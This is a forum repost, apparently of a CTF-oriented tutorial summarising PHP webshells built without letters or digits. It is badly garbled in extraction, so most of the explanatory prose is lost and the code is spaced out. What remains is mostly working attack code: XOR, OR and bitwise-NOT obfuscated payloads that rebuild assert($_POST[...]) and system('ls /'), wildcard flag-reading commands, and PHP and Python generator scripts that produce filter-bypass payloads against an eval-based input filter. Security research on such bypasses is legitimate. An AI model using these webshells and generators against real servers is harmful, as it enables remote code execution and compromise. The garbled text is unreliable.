搜索

[18563] 2021-05-20_Web安全无字母数字Webshell总结

文档创建者:s7ckTeam
浏览次数:34
最后更新:2025-01-18
2021-05-20_Web安全无字母数字Webshell总结 W e b   |   W e b s h e l l     W H O A M I   H A C K   2 0 2 1 - 0 5 - 2 0   W e b s h e l l   西   C T F   西   W e b s h e l l   s h e l l     W e b s h e l l         P H P     " a s s e r t " " s y s t e m " " f i l e _ p u t _ c o n t e n t s " " c a l l _ u s e r _ f u n c "   < ? p h p i f ( ! p r e g _ m a t c h ( ' / [ a - z 0 - 9 ] / i s ' , $ _ G E T [ ' s h e l l ' ] ) )   {     e v a l ( $ _ G E T [ ' s h e l l ' ] ) ; } a - z 0 - 9
  P H P     P H P   5     a s s e r t ( )         e v a l ( )     P H P   7   a s s e r t ( )     e v a l ( )   便   e v a l ( )     f i l e _ p u t _ c o n t e n t s ( )     G e t s h e l l   P H P     P H P         P H P             " p h p "   便 使     使                   P H P   P H P 使   e c h o   $ f = ' a s s e r t ' ; $ f ( . . . ) ; < ? p h p   ? > < ?   ? > < ? =   ? > < ? p h p   ? > ; < ?   ? > < ? p h p   ? > < ? =   ? > < ? p h p   e c h o   . . .   ? > < ? = ' H e l l o   W o r l d ' ? >         / /     " H e l l o   W o r l d " < ? p h p   e c h o   ` l s   / ` ; ? >
i m a g e - 2 0 2 1 0 5 0 7 2 3 1 3 4 6 3 6 0 使     i m a g e - 2 0 2 1 0 5 0 7 2 3 1 5 1 7 2 9 9   R C E       S h e l l           s h e l l < ? =   ? >   < ? =   ` l s   / ` ? > ?   ? * *   *
  0 1           S h e l l     P a y l o a d   f l a g P H P   5     P H P   7   1   P H P   5           P H P   7           P H P   7 . 0 . 1 2   2 P H P 5       P H P   7       P H P   使   ? * f l a g / f l a g : c a t   / f l a ? c a t   / f l a *         f l a g / f l a g . t x t : c a t   / f l a ? ? ? ? c a t   / f l a *         f l a g / f l a g s / f l a g . t x t : c a t   / f l a ? ? / f l a ? ? ? ? c a t   / f l a * / f l a *         f l a g f l a g g : c a t   / ? ? ? ? ? / f l a ? c a t   / ? ? ? ? ? / f l a * a s s e r t ( ) $ _ = a s s e r t ; $ _ ( ) a s s e r t ( ) e v a l ( ) ( $ a ) ( ) ( ' p h p i n f o ' ) ( ) ; ?
            W e b s h e l l   P H I T H O N     P a y l o a d 线       p r e g _ m a t c h ( )   线   P a y l o a d   ~ A < ? p h p $ _ = ( ' % 0 1 ' ^ ' ` ' ) . ( ' % 1 3 ' ^ ' ` ' ) . ( ' % 1 3 ' ^ ' ` ' ) . ( ' % 0 5 ' ^ ' ` ' ) . ( ' % 1 2 ' ^ ' ` ' ) . ( ' % 1 4 ' ^ ' ` ' ) ;   / /   $ _ = ' a s s e r t ' ; $ _ _ = ' _ ' . ( ' % 0 D ' ^ ' ] ' ) . ( ' % 2 F ' ^ ' ` ' ) . ( ' % 0 E ' ^ ' ] ' ) . ( ' % 0 9 ' ^ ' ] ' ) ;   / /   $ _ _ = ' _ P O S T ' ; $ _ _ _ = $ $ _ _ ; $ _ ( $ _ _ _ [ _ ] ) ;   / /   a s s e r t ( $ _ P O S T [ _ ] ) ; _ _ _ _ _ _ $ _ = ( ' % 0 1 ' ^ ' ` ' ) . ( ' % 1 3 ' ^ ' ` ' ) . ( ' % 1 3 ' ^ ' ` ' ) . ( ' % 0 5 ' ^ ' ` ' ) . ( ' % 1 2 ' ^ ' ` ' ) . ( ' % 1 4 ' ^ ' ` ' ) ; $ _ _ = ' _ ' . ( ' % 0 D ' ^ ' ] ' ) . ( ' % 2 F ' ^ ' ` ' / /     " _ "
  P H P     t x t     x o r _ r c e . t x t   P y t h o n     P a y l o a d < ? p h p         $ m y f i l e   =   f o p e n ( " x o r _ r c e . t x t " ,   " w " ) ; $ c o n t e n t s = " " ; f o r   ( $ i = 0 ;   $ i   <   2 5 6 ;   $ i + + )   {           f o r   ( $ j = 0 ;   $ j   < 2 5 6   ;   $ j + + )   {                   i f ( $ i < 1 6 ) {                         $ h e x _ i = ' 0 ' . d e c h e x ( $ i ) ;                 }                 e l s e {                         $ h e x _ i = d e c h e x ( $ i ) ;                 }                 i f ( $ j < 1 6 ) {                         $ h e x _ j = ' 0 ' . d e c h e x ( $ j ) ;                 }                 e l s e {                         $ h e x _ j = d e c h e x ( $ j ) ;                 }                 $ p r e g   =   ' / [ a - z 0 - 9 ] / i ' ;         / /                   i f ( p r e g _ m a t c h ( $ p r e g   ,   h e x 2 b i n ( $ h e x _ i ) ) | | p r e g _ m a t c h ( $ p r e g   ,   h e x 2 b i n ( $ h e x _ j ) ) ) {                                         e c h o   " " ;         }                 e l s e {                 $ a = ' % ' . $ h e x _ i ;                 $ b = ' % ' . $ h e x _ j ;                 $ c = ( u r l d e c o d e ( $ a ) ^ u r l d e c o d e ( $ b ) ) ;                 i f   ( o r d ( $ c ) > = 3 2 & o r d ( $ c ) < = 1 2 6 )   {                         $ c o n t e n t s = $ c o n t e n t s . $ c . "   " . $ a . "   " . $ b . " n " ;                 }         } } } f w r i t e ( $ m y f i l e , $ c o n t e n t s ) ; f c l o s e ( $ m y f i l e ) ; #   - * -   c o d i n g :   u t f - 8   - * - d e f   a c t i o n ( a r g ) :       s 1 = " "       s 2 = " "       f o r   i   i n   a r g :               f = o p e n ( " x o r _ r c e . t x t " , " r " )               w h i l e   T r u e :                       t = f . r e a d l i n e ( )                       i f   t = = " " :                               b r e a k                       i f   t [ 0 ] = = i :                               # p r i n t ( i )                               s 1 + = t [ 2 : 5 ]                               s 2 + = t [ 6 : 9 ]                               b r e a k               f . c l o s e ( )       o u t p u t = " ( " " + s 1 + " " ^ " " + s 2 + " " ) "       r e t u r n ( o u t p u t ) w h i l e   T r u e :       p a r a m = a c t i o n ( i n p u t ( " n [ + ]   y o u r   f u n c t i o n " )   ) + a c t i o n ( i n p u t ( " [ + ]   y o u r   c o m m a n d " ) ) + " ; "       p r i n t ( p a r a m )
P H P   使 [ + ]   y o u r   f u n c t i o n s y s t e m [ + ]   y o u r   c o m m a n d l s   / ( " % 0 8 % 0 2 % 0 8 % 0 8 % 0 5 % 0 d " ^ " % 7 b % 7 b % 7 b % 7 c % 6 0 % 6 0 " ) ( " % 0 c % 0 8 % 0 0 % 0 0 " ^ " % 6 0 % 7 b % 2 0 % 2 f " ) ;
  P H P     t x t   o r _ r c e . t x t   P y t h o n     P a y l o a d < ? p h p $ m y f i l e   =   f o p e n ( " o r _ r c e . t x t " ,   " w " ) ; $ c o n t e n t s = " " ; f o r   ( $ i = 0 ;   $ i   <   2 5 6 ;   $ i + + )   {           f o r   ( $ j = 0 ;   $ j   < 2 5 6   ;   $ j + + )   {                   i f ( $ i < 1 6 ) {                         $ h e x _ i = ' 0 ' . d e c h e x ( $ i ) ;                 }                 e l s e {                         $ h e x _ i = d e c h e x ( $ i ) ;                 }                 i f ( $ j < 1 6 ) {                         $ h e x _ j = ' 0 ' . d e c h e x ( $ j ) ;                 }                 e l s e {                         $ h e x _ j = d e c h e x ( $ j ) ;                 }                 $ p r e g   =   ' / [ 0 - 9 a - z ] / i ' ;         / /                   i f ( p r e g _ m a t c h ( $ p r e g   ,   h e x 2 b i n ( $ h e x _ i ) ) | | p r e g _ m a t c h ( $ p r e g   ,   h e x 2 b i n ( $ h e x _ j ) ) ) {                                         e c h o   " " ;         }                 e l s e {                 $ a = ' % ' . $ h e x _ i ;                 $ b = ' % ' . $ h e x _ j ;                 $ c = ( u r l d e c o d e ( $ a ) | u r l d e c o d e ( $ b ) ) ;                 i f   ( o r d ( $ c ) > = 3 2 & o r d ( $ c ) < = 1 2 6 )   {                         $ c o n t e n t s = $ c o n t e n t s . $ c . "   " . $ a . "   " . $ b . " n " ;                 }         } } } f w r i t e ( $ m y f i l e , $ c o n t e n t s ) ; f c l o s e ( $ m y f i l e ) ;
#   - * -   c o d i n g :   u t f - 8   - * - d e f   a c t i o n ( a r g ) :       s 1 = " "       s 2 = " "       f o r   i   i n   a r g :               f = o p e n ( " o r _ r c e . t x t " , " r " )               w h i l e   T r u e :                       t = f . r e a d l i n e ( )                       i f   t = = " " :                               b r e a k                       i f   t [ 0 ] = = i :                               # p r i n t ( i )                               s 1 + = t [ 2 : 5 ]                               s 2 + = t [ 6 : 9 ]                               b r e a k               f . c l o s e ( )       o u t p u t = " ( " " + s 1 + " " | " " + s 2 + " " ) "       r e t u r n ( o u t p u t ) w h i l e   T r u e :       p a r a m = a c t i o n ( i n p u t ( " n [ + ]   y o u r   f u n c t i o n " )   ) + a c t i o n ( i n p u t ( " [ + ]   y o u r   c o m m a n d " ) ) + " ; "       p r i n t ( p a r a m ) [ + ]   y o u r   f u n c t i o n s y s t e m [ + ]   y o u r   c o m m a n d l s   / ( " % 1 3 % 1 9 % 1 3 % 1 4 % 0 5 % 0 d " | " % 6 0 % 6 0 % 6 0 % 6 0 % 6 0 % 6 0 " ) ( " % 0 c % 1 3 % 0 0 % 0 0 " | " % 6 0 % 6 0 % 2 0 % 2 f " ) ;
使       P H I T H O N     U T F - 8             P H I T H O N     W e b s h e l l ' ' { 2 } " x 8 c " s e c h o   ~ ( ' ' { 1 } ) ;         / /   a e c h o   ~ ( ' ' { 2 } ) ;         / /   s e c h o   ~ ( ' ' { 2 } ) ;         / /   s e c h o   ~ ( ' ' { 1 } ) ;         / /   e e c h o   ~ ( ' ' { 1 } ) ;         / /   r e c h o   ~ ( ' ' { 2 } ) ;         / /   t $ _ _ = ( ' > ' > ' < ' ) + ( ' > ' > ' < ' ) ;         / /   $ _ _ = 2 ,   P H P $ _ = $ _ _ / $ _ _ ;         / /   $ _ = 1 $ _ _ _ _ = ' ' ; $ _ _ _ = " " ; $ _ _ _ _ . = ~ ( $ _ _ _ { $ _ } ) ; $ _ _ _ = " " ; $ _ _ _ _ . = ~ ( $ _ _ _ { $ _ _ } ) ; $ _ _ _ = " " ; $ _ _ _ _ . = ~ ( $ _ _ _ { $ _ _ } ) ; $ _ _ _ = " " $ _ _ _ _ _ = _ ; $ _ _ _ = " " ; $ _ _ _ _ _ . = ~ ( $ _ _ _ { $ _ _ } ) ; $ _ _ _ = " " ; $ _ _ _ _ _ . = ~ ( $ _ _ _ { $ _ _ } ) ; $ _ _ _ = " " ; $ _ _ _ _ _ . = ~ ( $ _ _ _ { $ _ } ) ; $ _ _ _ $ _ = $ $ _ _ _ _ _ ;     / /   $ _ = $ _ P O S T $ _ _ _ _ ( $ _ [ $ _ _ ] ) ;     / /   a s s e r t ( $ _ P O S T [ 2 ] )
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理